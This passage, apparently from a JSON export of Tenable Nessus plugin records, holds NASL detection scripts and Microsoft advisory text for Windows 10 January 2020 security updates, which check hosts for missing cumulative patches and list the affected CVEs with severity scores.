with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. 
(CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. 
An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. 
(CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534276/windows-10-update-kb4534276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c9c3e46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534276.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534276');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534276])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T22:48:25", "description": "The remote Windows host is missing security update 4534293.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure 
vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in Windows 10 when third party filters are called during a password update. 
Successful exploitation of the vulnerability could allow a user to make use of a blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. 
An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 
(CVE-2020-0601)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534293: Windows 10 Version 1803 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534293.NASL", "href": "https://www.tenable.com/plugins/nessus/132862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132862);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4534293\");\n script_xref(name:\"MSFT\", value:\"MS20-4534293\");\n\n script_name(english:\"KB4534293: Windows 10 Version 1803 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534293.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. 
(CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. 
An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. 
(CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534293/windows-10-update-kb4534293\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c0e39b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534293.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534293');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534293])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T22:48:45", "description": "The remote Windows host is missing security update 4534273.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. 
An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. (CVE-2020-0637)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A denial of service vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. 
(CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0644)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A security feature bypass vulnerability exists in Windows 10 when third party filters are called during a password update. Successful exploitation of the vulnerability could allow a user to make use of a blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 
